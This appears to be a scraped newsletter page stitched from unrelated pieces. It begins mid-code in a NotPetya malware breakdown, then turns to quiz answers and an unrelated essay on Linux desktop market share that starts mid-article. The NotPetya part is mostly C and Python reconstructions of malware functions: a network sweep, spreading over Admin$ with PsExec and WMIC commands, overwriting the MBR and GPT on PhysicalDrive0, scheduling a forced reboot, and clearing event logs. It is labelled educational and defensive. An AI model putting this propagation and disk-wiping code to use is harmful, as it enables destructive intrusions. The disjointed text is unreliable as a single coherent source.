        ip_int = struct.unpack_from("<I", buf.raw, offset + 16)[0]
        targets.append(socket.inet_ntoa(struct.pack("<I", ip_int)))
        offset += 24

    return list(set(targets))

def build_sweep_targets():
    seen = set(get_arp_targets())
    for local_ip in get_local_interface_ips():
        net = ipaddress.IPv4Network(f"{local_ip}/24", strict=False)
        for host in net.hosts():
            seen.add(str(host))
    return list(seen)

def check_smb_reachable(ip: str) -> bool:
    for port in (445, 139):
        try:
            with socket.create_connection((ip, port), timeout=0.75):
                return True
        except OSError:
            pass
    return False

Method 2: Credential-based SMB + PsExec / WMIC

For patched hosts, every harvested credential pair was tried against Admin$. On success, perfc.dat was copied across and executed remotely, PsExec first, WMIC as a fallback.

// Illustrative reconstruction Admin$ write + remote execution

#include <windows.h>
#include <winnetwk.h>

BOOL PropagateViaCreds(const char *targetIP,
                        const char *username,
                        const char *password,
                        const char *domain) {

    char adminShare[MAX_PATH], fullUser[256];
    snprintf(adminShare, MAX_PATH, "\\\\%s\\Admin$", targetIP);

    if (domain && strlen(domain) > 0)
        snprintf(fullUser, 256, "%s\\%s", domain, username);
    else
        strncpy(fullUser, username, 256);

    NETRESOURCE nr = {0};
    nr.dwType       = RESOURCETYPE_DISK;
    nr.lpRemoteName = adminShare;

    if (WNetAddConnection2(&nr, password, fullUser, 0) != NO_ERROR)
        return FALSE;

    char destPath[MAX_PATH];
    snprintf(destPath, MAX_PATH, "\\\\%s\\Admin$\\perfc.dat", targetIP);
    if (!CopyFile("C:\\Windows\\perfc.dat", destPath, FALSE)) {
        WNetCancelConnection2(adminShare, 0, TRUE);
        return FALSE;
    }

    // Primary: PsExec (embedded as dllhost.dat, dropped during init)
    char cmd[512];
    snprintf(cmd, 512,
        "C:\\Windows\\dllhost.dat \\\\%s -accepteula -s -d "
        "C:\\Windows\\System32\\rundll32.exe "
        "\"C:\\Windows\\perfc.dat\",#1 18",
        targetIP);
    WinExec(cmd, SW_HIDE);

    // Fallback: WMIC remote process creation
    snprintf(cmd, 512,
        "wmic /node:\"%s\" /user:\"%s\" /password:\"%s\" "
        "process call create "
        "\"C:\\Windows\\System32\\rundll32.exe C:\\Windows\\perfc.dat,#1\"",
        targetIP, fullUser, password);
    WinExec(cmd, SW_HIDE);

    WNetCancelConnection2(adminShare, 0, TRUE);
    return TRUE;
}

Microsoft’s post-incident analysis found that credential-based propagation caused more spread than EternalBlue. Organisations had patched MS17-010 after WannaCry. They hadn’t fixed over-privileged service accounts with tokens cached across every host in the domain.

Phase 4: MBR Overwrite and Scheduled Destruction

This is the phase that proved it was never ransomware. NotPetya obtained a raw write handle to \\.\PhysicalDrive0, overwrote the MBR with a malicious bootloader, then scheduled a forced reboot ~60 minutes out, giving propagation time to complete first.

// Illustrative reconstruction based on LogRhythm Labs binary analysis

#include <windows.h>

// Malicious bootloader 512-byte x86 real-mode blob stored as an
// embedded RT_RCDATA resource in perfc.dat, extracted at runtime.
extern unsigned char malicious_bootloader[512];

BOOL OverwriteMBR() {
    HANDLE hDisk = CreateFile(
        "\\\\.\\PhysicalDrive0",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, 0, NULL
    );
    if (hDisk == INVALID_HANDLE_VALUE) return FALSE;

    DWORD written;

    // Sector 0: overwrite the 512-byte MBR
    SetFilePointer(hDisk, 0, NULL, FILE_BEGIN);
    WriteFile(hDisk, malicious_bootloader, 512, &written, NULL);

    // Sectors 1–34: destroy GPT header + backup GPT
    // Ensures UEFI/GPT systems are unrecoverable, not just legacy MBR disks
    for (DWORD sector = 1; sector <= 34; sector++) {
        LARGE_INTEGER offset;
        offset.QuadPart = (LONGLONG)sector * 512;
        SetFilePointerEx(hDisk, offset, NULL, FILE_BEGIN);
        WriteFile(hDisk, malicious_bootloader, 512, &written, NULL);
    }

    CloseHandle(hDisk);
    return (written == 512);
}

void ScheduleReboot() {
    SYSTEMTIME st;
    GetLocalTime(&st);

    int delayMinutes = 60;
    int hour   = (st.wHour + ((st.wMinute + delayMinutes) / 60)) % 24;
    int minute = (st.wMinute + delayMinutes) % 60;

    char cmd[256];

    // Vista+: schtasks under SYSTEM
    snprintf(cmd, 256,
        "cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" "
        "/TR \"shutdown.exe /r /f\" /ST %02d:%02d", hour, minute);
    WinExec(cmd, SW_HIDE);

    // XP fallback: AT command
    snprintf(cmd, 256,
        "cmd.exe /c at %02d:%02d shutdown.exe /r /f", hour, minute);
    WinExec(cmd, SW_HIDE);
}

On reboot, the bootloader displayed a fake CHKDSK screen while Salsa20-encrypting the MFT in the background. With the MFT gone, the filesystem was unaddressable.

Repairing file system on C:
The type of the file system is NTFS.
Volume label is .

WARNING! F parameter not specified.
Running CHKDSK in read-only mode.
                                       [ 34% complete ]

# What was actually happening:
# Salsa20 encryption of MFT at \\.\PhysicalDrive0 offsets 0x0–0x4000
# Key derived locally, never transmitted. No recovery path.

The ransom note that followed was theatrical. The contact email (wowsmith123456@posteo.net) was shut down by Posteo within hours. There was never a decryption mechanism; the key was generated and immediately discarded.

Phase 5: Anti-Forensic Cleanup

Before the reboot triggered, NotPetya wiped Windows event logs, erasing the execution trail, credential theft, and lateral movement chain.

#include <windows.h>

void ClearEventLogs() {
    const char *channels[] = {
        "System", "Security", "Application",
        "Microsoft-Windows-TaskScheduler/Operational",
        NULL
    };
    for (int i = 0; channels[i]; i++) {
        HANDLE hLog = OpenEventLog(NULL, channels[i]);
        if (hLog) {
            ClearEventLog(hLog, NULL);  // NULL = discard, no backup
            CloseEventLog(hLog);
        }
    }
}

The log wipe was technically redundant; the disk was being destroyed moments later anyway. Microsoft flagged it as an indicator of either ingrained nation-state tradecraft or evidence that NotPetya was the cleanup layer over a separate, quieter operation that investigators never fully reconstructed.

NotPetya also fingerprinted running AV processes (Kaspersky, Symantec, Norton) and adjusted its remote execution path accordingly before propagating.

The Damage

$10 billion in global losses. Maersk: 45,000 PCs, 4,000 servers, 2,500 applications reinstalled across 130 countries in 10 days, $300 million lost. Merck: $870 million. FedEx: $400 million. Saint-Gobain: $384 million. Mondelēz: $190 million.

NotPetya also hit Rosneft and Evraz, two Russian state-owned enterprises, either collateral damage or deliberate deniability engineering. In February 2018, the US, UK, Australian, and Canadian governments formally attributed the attack to Sandworm, GRU Unit 74455. No other single cyber operation has simultaneously targeted private industry at this scale while serving a clear geopolitical objective and done so with a weapon that offered victims no recovery path by design.

Disclaimer & Methodology

This article is intended for educational and defensive research purposes only. All code snippets are illustrative reconstructions based on published analyses from CrowdStrike, LogRhythm Labs, ESET, Cisco Talos, and Microsoft. They are deliberately incomplete and non-operational; no working exploit code, shellcode, or bootloader payload is included.

Nothing in this article should be interpreted as a step-by-step guide or used against systems without explicit authorisation.

Sources

CrowdStrike Triple Threat Analysis | CVE-2017-0144 (EternalBlue)

Microsoft Security Blog Petya Kill Chain | LogRhythm Labs NOTPETYA Technical Analysis

ESET Research M.E.Doc Backdoor Analysis | Cisco Talos Backdoor Timeline

Wikipedia — 2017 Ukraine Ransomware Attacks | Columbia SIPA Case Study

Yesterday’s Answer: Bell-LaPadula

• The Bell-LaPadula model is specifically designed to enforce access control in systems where confidentiality is the main concern, such as government or military applications.

  Subscribe now

Yesterday’s Answer: SSH (Secure Shell)

• Unlike Telnet, FTP, and HTTP which transmit data in plaintext, SSH provides a secure encrypted connection for remote access to a system.

  Subscribe now

But something changed around 2025. The numbers started moving in ways they haven’t moved before, and the reason wasn’t that Linux suddenly got dramatically better overnight. It’s that Microsoft made Windows substantially worse. Let’s actually look at what’s happening, because this time the data is worth taking seriously.

The Numbers

Linux’s desktop market share globally stood at 2.76% in July 2022. By the end of 2025, StatCounter puts it at 4.7% worldwide, a 70% increase in three years. In the United States specifically, Linux crossed the 5% threshold for the first time in June 2025, hitting 5.03% according to StatCounter data. The US Digital Analytics Program, which tracks the operating systems of visitors to federal government websites, recorded that 6% of visitors were running Linux as of August 2025.

To put that growth trajectory in perspective: it took Linux two decades to reach 1% desktop market share in 2011, then another decade to reach 2%. Going from roughly 2% to nearly 5% in three years is unprecedented.

On Steam, which matters because gaming has historically been one of the most stubborn barriers to Linux adoption, Linux hit an all-time high of 3.20% of the platform’s user base in November 2025, up from 2.03% a year earlier. That’s a 57% year-over-year increase, representing approximately 4.2 million monthly active Linux gamers. Crucially, that growth is no longer just from Steam Deck owners. Data from the Steam survey shows that the share of Linux installs on SteamOS is declining, while Arch, Ubuntu, and gaming-focused distributions like CachyOS and Bazzite are increasing. People are going out of their way to install Linux on conventional hardware.

Among developers, Ubuntu remains a key indicator of wider desktop adoption. The Stack Overflow Developer Survey 2025 shows that 27.8% use Ubuntu for personal purposes and 27.7% for professional reasons, excluding WSL (Windows Subsystem for Linux).

What Actually Drove This

The Windows 10 End-of-Life Cliff

The single largest catalyst was Microsoft’s decision to end Windows 10 support on October 14, 2025. This alone created a migration moment affecting hundreds of millions of machines, and Microsoft ensured a significant portion couldn’t follow the ‘obvious’ upgrade path.

Windows 11’s TPM 2.0 requirement locked out a massive installed base of otherwise perfectly functional hardware. A machine running an Intel 7th- or 8th-generation processor, hardware that was mainstream and mid-range as recently as 2019, cannot officially upgrade to Windows 11. Microsoft’s official message to those users was stark: buy new hardware, or be left without security updates. Zorin OS, one of several Linux distributions explicitly marketing itself to Windows refugees, reported that over 780,000 Windows users had transitioned to Linux in the wake of the end-of-life announcements.

The TPM requirement wasn’t a neutral technical decision. It was a hardware-refresh driver wrapped in security rhetoric, and users understood it that way. A significant chunk chose a third option Microsoft hadn’t intended: leave Windows entirely.

Microsoft’s Alienation Campaign

Even among users with Windows 11-compatible hardware, 2025 became an extraordinary test of Microsoft’s ability to gauge exactly how much degradation users will tolerate before they leave. The company’s strategy throughout 2024–2025 was to position Windows 11 as an AI platform first and an operating system second. This manifested in a series of deeply unpopular decisions: Copilot integrations appearing in Notepad, Paint, File Explorer, and Edge, many of which required cloud connectivity and data transmission to be useful at all. Windows Recall, a feature that would screenshot and index everything you do on your PC, launched to a wave of privacy and security criticism so severe that Microsoft was forced to delay it by an entire year while it addressed fundamental security flaws. When Windows president Pavan Davuluri publicly announced that Windows would evolve into an ‘agentic OS,’ the backlash was so overwhelming that he was forced to disable replies to the post and issue a clarifying statement.

Windows Latest compiled a list of 20 major Windows 11 update bugs in 2025 alone. The Microsoft 365 Personal subscription price increased to $9.99 per month to cover the inclusion of mandatory AI features, up from $6.99. Community tools like Flyoobe emerged specifically to bypass Windows 11’s hardware requirements and surgically remove AI integrations during installation. The term ‘Microslop’ trended on social media. By January 2026, Microsoft had conceded ground, announcing plans to strip back Copilot from Notepad and Paint, pause new Copilot integrations, and reconsider the entire direction of Windows Recall. Internal leaks suggest the company is now describing Windows 11’s situation as requiring a ‘Windows 8.1 moment’, a soft reboot to recover from a catastrophic misjudgement of what users actually want. That’s a remarkable admission for the dominant desktop OS vendor. Windows actively drove users to look for alternatives, rather than Linux simply attracting them.

The Raw Performance Argument

There’s a pull factor that often gets overlooked in these discussions: Linux is simply faster on the same hardware. Windows 11’s background processes, telemetry services, Copilot integrations, and mandatory update infrastructure consume a non-trivial amount of system resources at idle. A machine running a lean Linux distribution, such as Ubuntu, Fedora, or especially Arch, will typically show lower RAM usage, lower CPU overhead at idle, and faster boot times on identical hardware. This is the kind of difference you feel daily on a mid-range machine.

The effect is most pronounced on AMD hardware, which has particularly strong open-source driver support on Linux. AMD’s GPU and APU drivers are developed in close collaboration with the Linux kernel community, ensuring a tightly integrated, well-optimised driver stack. On a machine with an AMD Ryzen processor and Radeon graphics, Linux isn’t just lighter; it can match or even surpass Windows in raw performance workloads. The Steam Deck benchmarks are illustrative: when LTT tested SteamOS against Windows 10 on the Deck’s AMD APU hardware, SteamOS outperformed Windows in all three games tested, hitting 34fps versus 19fps in Hitman 3 and 60fps versus 47fps in Doom Eternal.

For users with older hardware that can’t meet Windows 11’s TPM 2.0 requirement, this performance advantage is even more compelling. A five-year-old machine that Windows has effectively abandoned can often feel noticeably faster running a modern Linux distribution than it did running Windows 10. That’s a powerful argument for anyone facing the choice between buying new hardware to run Windows 11 or simply installing Linux on what they already own.

Valve’s Trojan Horse

On the gaming side, Valve’s quiet, multi-year project to make Linux a first-class gaming platform. The Steam Deck, launched in 2022, shipped approximately 5.6 million units by mid-2025 and runs SteamOS, an Arch Linux-based OS, out of the box. Every Steam Deck is essentially a Linux desktop in someone’s hands, often belonging to someone who has never considered operating systems before. But more important than the hardware is the software. Proton, Valve’s compatibility layer, now supports around 90% of Windows games to run on Linux without any changes. The Deck Verified programme has approved over 21,000 games for SteamOS. Proton 10.0 was released in 2025 with VKD3D-Proton 3.0 support, introducing AMD FSR 4 and substantial improvements to the shader backend. The main remaining obstacle to online multiplayer games with kernel-level anti-cheat systems (EAC, BattlEye) is being reduced but not yet removed.

In 2025, Valve also expanded official SteamOS support to third-party handhelds, including the Lenovo Legion Go S and ASUS ROG Ally, and announced the upcoming Steam Machine and Steam Frame. SteamOS is no longer just for the Steam Deck. Valve is gradually developing a Linux gaming ecosystem that features a level of vertical integration and refinement that Linux gaming has not experienced before.

The Security Aspect

Windows Recall’s fundamental architecture is a continuously running screenshot service that OCRs and indexes your screen, alarming security researchers not because the implementation was flawed (though it was), but because the concept creates a single, searchable database of everything you’ve ever done on your machine. Even after Microsoft’s revisions, the feature remains a soft target for any malware that achieves local code execution. The attack surface is obvious: compromise the process, gain access to months of screen history. More broadly, Windows 11’s increasing cloud dependency, with AI features that require data transmission to Microsoft’s servers to function, creates data exposure vectors that simply don’t exist on a locally-running Linux install.

For security-conscious users, developers, and professionals handling sensitive data, the control and transparency of a Linux environment have always had appeal. The difference now is that the cost of switching is dramatically lower than it was five years ago. The growing adoption of Linux among developers (nearly 28% on Ubuntu for personal use) has a downstream security benefit: more tooling, better documentation, and shorter paths from security research to actionable knowledge all flow from having a large and active Linux desktop user base.

The Remaining Barriers

None of this means Linux is about to replace Windows. Let’s be clear about what’s still not solved. Anti-cheat is the largest gaming blocker. Titles using kernel-level anti-cheat on EasyAntiCheat or BattlEye require explicit developer opt-in for Proton support. Popular competitive games, such as Valorant, PUBG in some configurations, and some Call of Duty titles, remain inaccessible on Linux. For competitive gamers, this is a dealbreaker.

Software compatibility still has gaps. Adobe Creative Suite has no native Linux support. The Microsoft Office ecosystem, while accessible via web apps and wine/compatibility layers, isn’t seamless for power users. For users in creative fields such as video editing, design, photography, and audio engineering, the software gap is significant enough that many won’t be moving to Linux at all. They’ll be heading to macOS. And in 2025, that switch became more economically viable than it has been in years. While tariffs on electronics raised initial costs, the fast expansion of AI data centres created additional pricing pressure by redirecting memory and advanced components away from consumer supply chains. This combination led many PC manufacturers to increase their prices, but Apple was positioned differently.

The company had negotiated long-term supply agreements with component manufacturers, diversified its supply chain aggressively into India (for iPhones) and Vietnam (for Macs and iPads), and used its enormous purchasing leverage to absorb costs competitors couldn’t. The result: Apple actually cut the price of the M4 MacBook Air by $100 at a time when comparable Windows laptops were getting more expensive. For a video editor or designer weighing a Mac against a Windows machine, the historical ‘Macs are too expensive’ argument simply carries less weight when the price gap narrows. Not to mention that Apple Silicon Macs offer exceptional performance, battery life, and security posture.

That said, the Linux software landscape is better for creative work than its reputation suggests. DaVinci Resolve, Blackmagic’s professional video editor used across film and television production, runs natively on Linux and is competitive with, arguably superior to, Premiere Pro in many workflows. Blender, the 3D creation suite used in professional VFX pipelines, is Linux-native and has seen rapid growth. Kdenlive, Audacity, GIMP, and the broader open-source creative stack are increasingly viable options for users who don’t already depend on Adobe. The honest story is that someone starting fresh in a creative field today has more Linux-compatible options than they did five years ago, but someone already embedded in the Adobe ecosystem has a much steeper switching cost.

Hardware driver support has improved significantly, but it isn’t universal. NVIDIA’s proprietary drivers have improved on Linux but remain more complex to configure than on Windows. Peripheral support, especially gaming peripherals, can require workarounds.

The Ouroboros Problem And Why It Might Finally Be Breaking

There’s a structural argument that has kept Linux stuck for decades, and it’s worth naming directly because it’s the real mountain Linux needs to climb. The problem is a classic adoption loop: developers don’t build for Linux because Linux has too small a market share to justify the engineering cost. But Linux has too small a market share, partly because users who want to switch can’t find the tools they need there. The platform stays small because it’s small. Every time someone evaluated Linux seriously and found their industry software missing, their game incompatible, or their professional workflow unsupported, they went back to Windows, and the market share number stayed low enough that developers never had a reason to reconsider. This is the same dynamic that kept Linux gaming irrelevant for years. Why would studios port to Linux when Linux users accounted for only 1% of Steam users? And why would users switch to Linux when their games didn’t run there?

Valve broke that cycle in gaming by artificially solving the supply side with Proton, meaning developers didn’t need to do anything, and compatibility was still achieved. That’s a meaningful proof of concept. But for productivity software, enterprise tooling, and professional creative applications, there’s no equivalent compatibility layer that makes Adobe just work. The only thing that changes the calculus for those developers is market share.

This is exactly why the current growth moment matters more than the raw 4.7% number suggests. There’s a threshold somewhere between 5% and 10% of the desktop market share at which Linux stops being a rounding error and becomes a segment developers have to consciously decide to ignore. At 1-2%, ignoring Linux was the obvious default. At 5% and rising rapidly, it becomes a decision that requires justification. At 8-10%, it starts costing companies real money. The Steam data is instructive here. Once Linux gaming crossed 3% on Steam, the conversation in game development communities visibly shifted from ‘should we support Linux’ to ‘can we afford not to?’ Valve’s Deck Verified program created commercial pressure: a game without Deck certification is less visible in Steam’s storefront. That’s the market mechanism working.

The same logic will eventually apply to productivity software. If Linux desktop share reaches 6-8%, which current trajectories suggest is possible by 2027, the calculation for software vendors changes. Companies like Adobe, Autodesk, and others have already built cross-platform infrastructure for macOS support. The marginal engineering cost to extend that to Linux is lower than it was when their entire stack was Windows-native. What’s been missing is the demand signal. More users switching to Linux creates that signal, which attracts more software, which makes Linux a more viable destination for the next wave of switchers. The loop can run in reverse. It’s not guaranteed, and it won’t be fast. But for the first time in Linux’s desktop history, the growth rate is high enough that the question of critical mass is no longer purely hypothetical.

So, Is This Actually It?

The data argues something more nuanced than ‘the joke is dead’ or ‘the joke lives on’. Linux desktop adoption is driven by a combination of genuine platform improvements and an unusually severe push from Windows. The US crossing 5% is meaningful, not because 5% is a world-conquering number, but because the growth rate to get there is unlike anything in Linux’s desktop history. What’s also different this time is the quality of growth. The Steam survey data showing SteamOS declining as a share of Linux gamers while desktop distributions rise suggests this isn’t just the Steam Deck inflate-the-numbers effect. People are choosing to install Linux on their machines. Developer adoption is creating an ecosystem effect: better documentation, more compatible software, and more hardware vendor attention.

The more useful question than ‘is this the year’ is whether Linux has passed a threshold at which its growth becomes self-sustaining, where the installed base is large enough to attract software developers, hardware vendors, and enterprise support that, in turn, attract more users. The joke may not be dead. But it might be closer to a retirement announcement than a punchline.

Data sources: StatCounter Global Stats, US Digital Analytics Program, Steam Hardware & Software Survey (Valve), Stack Overflow Developer Survey 2025, Bitsight, Zorin OS, NotebookCheck, WindowsCentral, WindowsLatest, GamingOnLinux

Yesterday’s Answer: SMTPS (Simple Mail Transfer Protocol Secure)

• SMTPS uses SSL/TLS (Secure Sockets Layer/Transport Layer Security) to encrypt communication between the email client and server.

Subscribe now